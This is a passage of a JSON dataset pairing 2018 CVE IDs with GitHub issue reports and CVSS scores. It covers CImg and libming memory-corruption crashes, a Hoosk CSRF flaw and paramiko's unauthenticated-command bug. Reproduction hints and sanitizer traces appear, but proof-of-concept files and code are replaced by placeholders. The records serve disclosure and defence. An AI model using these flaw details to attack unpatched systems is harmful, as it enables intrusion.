        "description": "double free when load bmp image. a double free when load a crafted image using cimg. the tested code commit is APITAG reports by the address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG attempting double free on NUMBERTAG a NUMBERTAG in thread T NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbc NUMBERTAG in _IO_default_finish ( PATHTAG NUMBERTAG f1be NUMBERTAG bd NUMBERTAG e in fclose ( PATHTAG NUMBERTAG f1be4f6f7cd in fclose ( PATHTAG NUMBERTAG a NUMBERTAG in APITAG ) APITAG NUMBERTAG b NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG b NUMBERTAG a4 in APITAG char>::load(char const ) APITAG NUMBERTAG fa in APITAG char>::assign(char const ) APITAG NUMBERTAG fa in APITAG APITAG const ) APITAG NUMBERTAG fa in main PATHTAG NUMBERTAG f1be NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG a NUMBERTAG is located NUMBERTAG bytes inside of NUMBERTAG byte region APITAG freed by thread T0 here NUMBERTAG f1be4f NUMBERTAG ca in __interceptor_free ( PATHTAG NUMBERTAG f1be NUMBERTAG cbe3c in _IO_default_finish ( PATHTAG ) previously allocated by thread T0 here NUMBERTAG f1be4f NUMBERTAG in malloc ( PATHTAG NUMBERTAG f1be NUMBERTAG bd1d4 in _IO_file_doallocate ( PATHTAG ) SUMMARY: APITAG double free NUMBERTAG interceptor_free NUMBERTAG ABORTING poc: URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7590",
        "Issue_Url_old": "https://github.com/havok89/Hoosk/issues/45",
        "Issue_Url_new": "https://github.com/havok89/hoosk/issues/45",
        "Repo_new": "havok89/hoosk",
        "Issue_Created_At": "2018-03-01T08:28:19Z",
        "description": "CSRF issue that allow to attacker create an account. Hello. I want to report this CMS has CSRF issue in admin pages. When attacker induce authenticated admin user to a malicious web page, the account will be created without admin user's intention. Here is how to reproduce the issue NUMBERTAG Login to admin APITAG NUMBERTAG Keep login and access the html it has following content CODETAG NUMBERTAG And account username = APITAG is created without admin user's intention.",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7637",
        "Issue_Url_old": "https://github.com/dtschump/CImg/issues/185",
        "Issue_Url_new": "https://github.com/greyclab/cimg/issues/185",
        "Repo_new": "greyclab/cimg",
        "Issue_Created_At": "2018-03-02T03:40:55Z",
        "description": "other testcases lead to heap overflow by loading crafted images. A heap overflow occurs at different location in APITAG when loading the crafted image file . the tested code commit is APITAG the reports with address sanitizer as follows: APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG ef9c at pc NUMBERTAG bp NUMBERTAG ffc NUMBERTAG d NUMBERTAG sp NUMBERTAG ffc NUMBERTAG d NUMBERTAG READ of size NUMBERTAG at NUMBERTAG ef9c thread T NUMBERTAG in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f injjj main PATHTAG NUMBERTAG ff NUMBERTAG e NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG f8 in _start ( PATHTAG NUMBERTAG ef9c is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG ff NUMBERTAG f NUMBERTAG a6b2 in operator APITAG long) ( PATHTAG NUMBERTAG f in APITAG int, unsigned int, unsigned int, unsigned int) APITAG NUMBERTAG f4 in APITAG char>::_load_bmp(_IO_FILE , char const ) APITAG NUMBERTAG addc4 in APITAG char>::load_bmp(char const ) APITAG NUMBERTAG addc4 in APITAG char>::load(char const ) APITAG NUMBERTAG f in APITAG char>::assign(char const ) APITAG NUMBERTAG f in APITAG APITAG const ) APITAG NUMBERTAG f in main PATHTAG SUMMARY: APITAG heap buffer overflow APITAG APITAG char>::_load_bmp(_IO_FILE , char const ) Shadow bytes around the buggy address NUMBERTAG c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9df NUMBERTAG fa fa fa fa NUMBERTAG fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c0c7fff9e NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING pocs : URLTAG URLTAG URLTAG URLTAG URLTAG",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7648",
        "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1088",
        "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1088",
        "Repo_new": "uclouvain/openjpeg",
        "Issue_Created_At": "2018-02-22T01:09:33Z",
        "description": "sprintf buffer overflow. URLTAG Hello, it looks like this APITAG could overflow the buffer that is supplied for it. Thanks",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7652",
        "Issue_Url_old": "https://github.com/dotse/zonemaster-gui/issues/217",
        "Issue_Url_new": "https://github.com/zonemaster/zonemaster-gui--archived-old-version-not-to-be-used/issues/217",
        "Repo_new": "zonemaster/zonemaster-gui--archived-old-version-not-to-be-used",
        "Issue_Created_At": "2018-02-19T13:39:51Z",
        "description": "Update GUI security. Update GUI for security reasons (escape HTML)",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 6.1,
        "impactScore": 2.7,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7662",
        "Issue_Url_old": "https://github.com/CouchCMS/CouchCMS/issues/46",
        "Issue_Url_new": "https://github.com/couchcms/couchcms/issues/46",
        "Repo_new": "couchcms/couchcms",
        "Issue_Created_At": "2018-03-04T06:15:02Z",
        "description": "phpmailer.php and FILETAG leak disclosure the full path. Location: APITAG and APITAG Rows NUMBERTAG Harm: Web Site physical path leakage . FILETAG FILETAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7712",
        "Issue_Url_old": "https://github.com/opencv/opencv/issues/10998",
        "Issue_Url_new": "https://github.com/opencv/opencv/issues/10998",
        "Repo_new": "opencv/opencv",
        "Issue_Created_At": "2018-03-06T06:20:03Z",
        "description": "assertion failure cause a denial of service . In some cases, an assertion failure may be intentional behavior, not a vulnerability, However, Assertion failure may cause denial of service attacks in some cases. And CVE IDs have been assigned such as CVETAG , CVETAG , CVETAG .",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7725",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/39",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/39",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-03-06T01:56:42Z",
        "description": "Invalid memory address dereference in zzip_disk_fread (in APITAG . Hi,it's a issues about the zziplib NUMBERTAG It crashed in function zzip_disk_fread.the details are below(ASAN): ./unzzip mem NUMBERTAG null p ASAN:SIGSEGV APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG ffff7fec NUMBERTAG pc NUMBERTAG ffff5d NUMBERTAG bd bp NUMBERTAG e NUMBERTAG sp NUMBERTAG fffffffdd NUMBERTAG T NUMBERTAG ffff5d NUMBERTAG bc in inflate ( PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_disk_fread PATHTAG NUMBERTAG ffff6c NUMBERTAG in zzip_mem_disk_fread PATHTAG NUMBERTAG in unzzip_mem_disk_cat_file PATHTAG NUMBERTAG ae8 in unzzip_cat PATHTAG NUMBERTAG f NUMBERTAG in unzzip_extract PATHTAG NUMBERTAG e3 in main PATHTAG NUMBERTAG ffff NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG fa8 in _start ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEG NUMBERTAG inflate NUMBERTAG ABORTING POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7726",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/41",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/41",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-03-06T09:43:27Z",
        "description": "Bus error in __zzip_parse_root_directory (in APITAG In APITAG NUMBERTAG there is a bus error caused by the __zzip_parse_root_directory function of zzip/zip.c. attackers could leverage this vulnerability to cause a denial of service via a crafted zip file. To reproduce the issue, run: ./zzdir $POC: ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7727",
        "Issue_Url_old": "https://github.com/gdraheim/zziplib/issues/40",
        "Issue_Url_new": "https://github.com/gdraheim/zziplib/issues/40",
        "Repo_new": "gdraheim/zziplib",
        "Issue_Created_At": "2018-03-06T02:34:16Z",
        "description": "There are memory leaks in zziplib NUMBERTAG which is trigged in zzip_mem_disk_new(in APITAG There are some memory leaks in zziplib which is trigged in function zzip_mem_disk_new(in APITAG Steps to Reproduce: ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7738",
        "Issue_Url_old": "https://github.com/karelzak/util-linux/issues/539",
        "Issue_Url_new": "https://github.com/util-linux/util-linux/issues/539",
        "Repo_new": "util-linux/util-linux",
        "Issue_Created_At": "2017-11-16T08:19:53Z",
        "description": "Bash completion for umount fails if mount point contains a space. Arch Linux, util linux version NUMBERTAG For example, the mount point APITAG : $ cat /proc/mounts | grep media /dev/sdb1 PATHTAG vfat APITAG APITAG ro NUMBERTAG I type APITAG and it gets completed to APITAG . Maybe umount URLTAG should take a page from the book of bash completions URLTAG and parse APITAG , instead of mount output. (I originally thought this was a bug URLTAG in APITAG , until I realized that my distro replaces its umount completion in favour of that from APITAG .)",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7745",
        "Issue_Url_old": "https://github.com/cobub/razor/issues/161",
        "Issue_Url_new": "https://github.com/cobub/razor/issues/161",
        "Repo_new": "cobub/razor",
        "Issue_Created_At": "2018-03-07T15:37:38Z",
        "description": "Some vulnerability NUMBERTAG create user without login Just update the url without login, the test user will be create. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG APITAG NUMBERTAG add data without login and execute evil code. Change the channel_id then Open html page even without APITAG admin access PATHTAG ,the evil code will execute. APITAG APITAG APITAG '', '/') APITAG APITAG APITAG APITAG APITAG \" /> APITAG APITAG APITAG APITAG APITAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7750",
        "Issue_Url_old": "https://github.com/paramiko/paramiko/issues/1175",
        "Issue_Url_new": "https://github.com/paramiko/paramiko/issues/1175",
        "Repo_new": "paramiko/paramiko",
        "Issue_Created_At": "2018-03-13T00:02:03Z",
        "description": "Server implementation does not check for auth before serving later requests. What follows is a direct paste from a private gist used to workshop the issue a bit late last week; have completed tests/impl (from NUMBERTAG and will be pushing those shortly. (wanted the issue number set in stone APITAG We have a CVE for this issue: CVETAG . Intro Email from one Matthijs Kooijman ( MENTIONTAG URLTAG dated APITAG notes that Paramiko's server implementation may be connected to by clients that do not implement the auth step, and happily serves up commands/etc to such un authed clients. He found that APITAG (another Python lib that does not use Paramiko) has the same issue. Finally, he states the RFC is unclear as to whether this is purposeful. Let's double check both the RFCs and then our favorite reference implementation, APITAG Should neither provide a useful clue, my gut says the server implementation should track whether we've sent APITAG NUMBERTAG sure we already do track this) and default to rejecting any connection level messages (like APITAG or APITAG ) unless that flag is True. RFC scan tl;dr it is indeed kinda vague, there are two kinda disagreeing undercurrents, neither of which are ironclad: It is _assumed_ that the connection protocol (which is where command exec occurs) runs on top of / after setting up, the transport (initial PATHTAG ) and auth (user auth) protocols. The specific server implementation, and/or operator of an instantiation of such an implementation, has _significant leeway_ in how they implement and/or configure the server, re: when and how user auth occurs. Specifics: RFC NUMBERTAG protocol arch NUMBERTAG URLTAG : pretty clear that the intent is that a user auth step always occurs, followed by a service request: > The client sends a service request once a secure transport layer > connection has been established. A second service request is sent after > user authentication is complete. FILETAG : third bullet point re: policy issues that 'SHOULD' be addressed, highlights that auth specifics are up to the site/operator: > The authentication methods that are to be required by the server for > each user. The server's policy MAY require multiple authentication for > some or all users. The required algorithms MAY depend on the location > from where the user is trying to gain access. FILETAG : this whole section arguably applies, but it's very vague. However it _seems_ to back up my hunch that at core, this is up to the server implementer and/or operator, e.g: > At the discretion of the implementers, this default policy may be along > the lines of anything goes where there are no restrictions placed upon > users ...] RFC NUMBERTAG auth protocol NUMBERTAG URLTAG : more vague implications that the server can do whatever it wants, e.g. the below quote about none auth implies the authors at least partly considered servers that intentionally don't care about auth at all (though the specific discussion is about the actual, explicit use of the none auth type message, which is distinct from \"did not submit auth at all\"): > The \"none\" method is reserved, and MUST NOT be listed as supported. > However, it MAY be sent by the client. The server MUST always reject > this request, unless the client is to be granted access without any > authentication, in which case, the server MUST accept this request. FILETAG : this (like NUMBERTAG states that the server should start up the requested service after sending auth success. One could read this to imply that services SHOULD NOT start UNLESS auth has occurred, but it's not explicit NUMBERTAG URLTAG : notes that implementations MUST implement public key auth, though I note this is distinct from requiring that it is _enabled_ (clearly, many real servers only offer password auth, for example.) RFC NUMBERTAG transport protocol NUMBERTAG URLTAG : implies client may request \"a service\" after initial (high level) kex, where that service is one of userauth or connection. The transport level of the protocol thus doesn't appear to actually care or enforce that one performs auth before connection. RFC NUMBERTAG connection protocol NUMBERTAG URLTAG : once again implies that connection is \"designed to\" occur after/on top of auth NUMBERTAG URLTAG : again, it's 'assumed': > This protocol is assumed to run on top of a secure, authenticated > transport. User authentication and protection against network level > attacks are assumed to be provided by the underlying protocols. APITAG implementation My old friend and the only C codebase I have any familiarity with whatsoever, openssh portable URLTAG ... Synopsis After all the below, the tl;dr seems to be: APITAG sets up a dispatch table to determine how it responds to protocol messages/packets This table gets reinitialized depending on 'phase' of execution: while awaiting auth, it is only set to respond to auth related messages, then after successful auth, it retools the table to only respond to post auth related messages like channel opens. Thus, the case under test ends up being a simple APITAG even are you talking about? What's a channel open?\" ERRORTAG style situation no auth step, no idea how to handle anything beyond auth. Deep dive Main SSH2 server loop is APITAG > APITAG Which uses a dispatch table to handle inbound messages: URLTAG Which dispatches to other functions, so when it sees eg APITAG it calls APITAG : URLTAG Which is defined here: URLTAG If the user is asking for command exec, that's channel type session : URLTAG Which calls APITAG : URLTAG Which calls APITAG with a handle on APITAG : URLTAG This is our first apparent reference to anything auth related so far... The only other apparent external context is the ssh object used to get the actual channel in play on the call prior: URLTAG That auth context object is extern 'd at top of file: URLTAG We'll dig into that later if necessary but for now, let's assume it has handy ways of telling whether the user is authed or not, and the question is whether/how those are consulted. APITAG is, bizarrely, defined in APITAG : URLTAG It checks for APITAG (or a null password entry) and gets mad if not true: URLTAG So yea, we gotta doublecheck what that APITAG member actually maps to. Authctxt struct is defined in APITAG here: URLTAG It has a bunch of flags, of which success , authenticated , and valid all seem relevant. success is not documented; authenticated sounds like it maps to, well, authentication (user is who they claim to be) with valid mapping to (a generic level of) authorization (the user is actually allowed to login.) Those flags (esp valid ) aren't set in too many places; the most useful and in retrospect most obvious place is in handling of userauth requests: URLTAG The core of this is actually use of Authmethod structs ( format defined here URLTAG created by the various APITAG modules (one for each implemented auth backend kerberos, password, publickey, hostbased, etc) These are simple name , userauth , enabled structures, with userauth being a pointer to an implementation function (so e.g. the one for password auth is referencing APITAG in APITAG ( here URLTAG The per method userauth func is called and the result stored as authenticated var: URLTAG Which bubbles down (after much state machine checking) to finalizing userauth sending the success network message, updating APITAG , etc: URLTAG The APITAG flag seems to actually just be \"is the requested username a valid local system user\": URLTAG Note use of getpwnamallow , which (basically) wraps the syscall getpwnam aka \"get password entry for user\" (so APITAG is specifically that structure and not just a password) Which explains why it's distinct from success and authenticated . Initial distillation Seems at first that \"huh, the user can get a session as long as they exist locally, without necessarily passing auth\" which would be bad but would also act like Paramiko. However, realized: that APITAG flag is set by APITAG , meaning the client has to actually submit auth in order to set it. APITAG APITAG .) So if a user attempts to send a channel open request without authing, both APITAG and APITAG will be null, and thus APITAG should call line NUMBERTAG URLTAG and thus result in APITAG . Testing with live APITAG server Proving this with a live install is interesting: Ran local docker container executing Ubuntu + APITAG NUMBERTAG on port NUMBERTAG with nothing but root password auth by default Executed Matthijs's APITAG with nothing but the port number changed Did not get expected no user for session but instead seem to have just confused the poor thing: ERRORTAG Second dive The above protocol error log message comes out of here: URLTAG in ERRORTAG Which is stuffed into newly initialized dispatch tables by ssh_dispatch_init URLTAG Which is done via APITAG here: URLTAG So the tl;dr is that the dispatch table gets all NUMBERTAG slots filled initially by ERRORTAG , then the table is filled in with what is intended to be responded to (e.g. in APITAG , the very next line is to say \"ok and now respond to service requests\" URLTAG E.g. slot NUMBERTAG corresponds to APITAG , aka what our test client was requesting: FILETAG Looks like in the normal flow of things, the post auth process ends up reinitializing the dispatch table with acceptable messages (including channel opens): Server loop emits APITAG interactive session\" log message one can see in a successful regular auth+shell: URLTAG Then calls APITAG : URLTAG Which does aforementioned dispatch reset & fill in: URLTAG End result The RFC isn't terrifically clear beyond \"well, we kind of assume you're not gonna open channels and such unless you've already authed\", but it's not a SHOULD or a MUST . APITAG has chosen to implement this as a strict \"only respond to the messages you can handle at the current stage\" setup, where auth comes before connection (as in the RFC.) Trying to do things out of order results in a simple ERRORTAG . Paramiko does not do things quite that way: instead, as one might guess from the bug description, it simply sets up all possible dispatch targets (anything implemented by the Transport across its two handler tables, and the APITAG handler table) and then dispatches depending on message type: URLTAG Doing nothing certainly seems like a bad idea: this is clearly a massive security flaw, and the only reason I did all the above investigation is because software has an irritating history of \"but I was _relying_ on that bug / looseness in the spec / whatever!\". Given the main reference implementation disallows it, I'm inclined to assume nobody could possibly rely on this. So there's two obvious fixes for Paramiko: The APITAG is the Bible\" approach: update Transport's dispatching to be more like APITAG and only enable certain message types depending on the state of APITAG (which, impressively, appears to only ever be used in APITAG ...!!!) This could be problematic given that Transport is frustratingly bimodal and is used both for server _and_ client operations we'd have to make sure that we're not preventing a not yet authed client from dispatching on necessary responses because it's not authed yet, for example. Of note, APITAG is taking this approach in their fix, and are simply leveraging the fact that RFC NUMBERTAG compatible protocol numbers mean one can just go \"is the message identifier greater than the highest possible auth related number? Are you authed yet? No? Screw off!\" seems possible on our end, though doesn't really change the previous point about ensuring client side cases are protected. The \"that's too much work right now\" approach: simply rub some more references to APITAG and/or APITAG in specific spots such as APITAG ( here URLTAG Except this, too, is problematic because of how Transport, Server and APITAG split up responsibilities & exposures to one another. By default a Server has no direct access to the Transport running it, or that Transport's APITAG (which, in server mode, is set up during rekeying [including initial kex].) Changing this would be backwards incompatible (e.g. enforcing an actual APITAG on Server subclasses for the passing in of a reference to one of the other objects, since right now Server doesn't even define one!) though I would like to examine it sometime. Now probably not the best time though. Could still put specific, small scoped changes in Transport though, such as around the APITAG calls here: URLTAG My gut says to take a quick stab at the NUMBERTAG st approach but to fall back to the NUMBERTAG nd if the NUMBERTAG st cannot be done relatively painlessly. Either way, re: the actual action to take seems poorly defined, but esp given APITAG simply spits out a bunch of question marks and not a \"useful\" error; the RFCs NUMBERTAG list only NUMBERTAG default 'error' types, of which APITAG seems the closest fit. And indeed Paramiko uses it for eg bogus channel types, in some legacy tests.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7752",
        "Issue_Url_old": "https://github.com/gpac/gpac/issues/997",
        "Issue_Url_new": "https://github.com/gpac/gpac/issues/997",
        "Repo_new": "gpac/gpac",
        "Issue_Created_At": "2018-02-26T09:11:01Z",
        "description": "Stack buffer overflow in avc_parsers.c. The stack buffer overflow occurs here URLTAG : APITAG I don't know exactly how APITAG works, but it seems to return a APITAG . The size of APITAG is only NUMBERTAG entries, so we can get this to overflow. The sps variable is a stack variable that comes from a parent function, for example in APITAG . Using this bug, I can craft an MP4 file that can overwrite anything above this variable in the stack, such as other fields in APITAG , stack variables, etc.",
        "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2018-7866",
        "Issue_Url_old": "https://github.com/libming/libming/issues/118",
        "Issue_Url_new": "https://github.com/libming/libming/issues/118",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T08:42:15Z",
        "description": "Null pointer dereference vulnerability in APITAG APITAG . Hi, i found a null pointer dereference bug in the libming NUMBERTAG It crashed in function APITAG details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7867",
        "Issue_Url_old": "https://github.com/libming/libming/issues/116",
        "Issue_Url_new": "https://github.com/libming/libming/issues/116",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T08:21:57Z",
        "description": "heap buffer overflow in APITAG Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7868",
        "Issue_Url_old": "https://github.com/libming/libming/issues/113",
        "Issue_Url_new": "https://github.com/libming/libming/issues/113",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T07:50:29Z",
        "description": "heap buffer overflow in APITAG . Hi, i found a heap buffer overflow bug in the libming NUMBERTAG the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7869",
        "Issue_Url_old": "https://github.com/libming/libming/issues/119",
        "Issue_Url_new": "https://github.com/libming/libming/issues/119",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T09:01:56Z",
        "description": "There are a lot of memory leaks in libming NUMBERTAG which is trigged in dcinit(in APITAG ./swftoc NUMBERTAG mem leaks swf /dev/null FILETAG vim FILETAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG fe8e in dcinit PATHTAG NUMBERTAG ebf2 in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG in realloc ( PATHTAG NUMBERTAG d NUMBERTAG d in APITAG PATHTAG NUMBERTAG fd6b in APITAG PATHTAG NUMBERTAG f NUMBERTAG in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG fc NUMBERTAG b NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG in push PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG c NUMBERTAG in APITAG PATHTAG NUMBERTAG e7b8 in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG b NUMBERTAG e in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG eba0 in APITAG PATHTAG NUMBERTAG eccd in APITAG PATHTAG NUMBERTAG d NUMBERTAG in APITAG PATHTAG NUMBERTAG e NUMBERTAG in APITAG PATHTAG NUMBERTAG f3d9 in APITAG PATHTAG NUMBERTAG fb0e in main PATHTAG NUMBERTAG fc NUMBERTAG b NUMBERTAG f in __libc_start_main ( PATHTAG ) ...... ...... POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2018-7870",
        "Issue_Url_old": "https://github.com/libming/libming/issues/117",
        "Issue_Url_new": "https://github.com/libming/libming/issues/117",
        "Repo_new": "libming/libming",
        "Issue_Created_At": "2018-03-07T08:29:46Z",
        "description": "Invalid memory address dereference in APITAG (in APITAG Hi, i found a issue in the libming NUMBERTAG It crashed in function APITAG .the details are below(ASAN): ERRORTAG POC FILE: URLTAG",
        "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2018-7871",
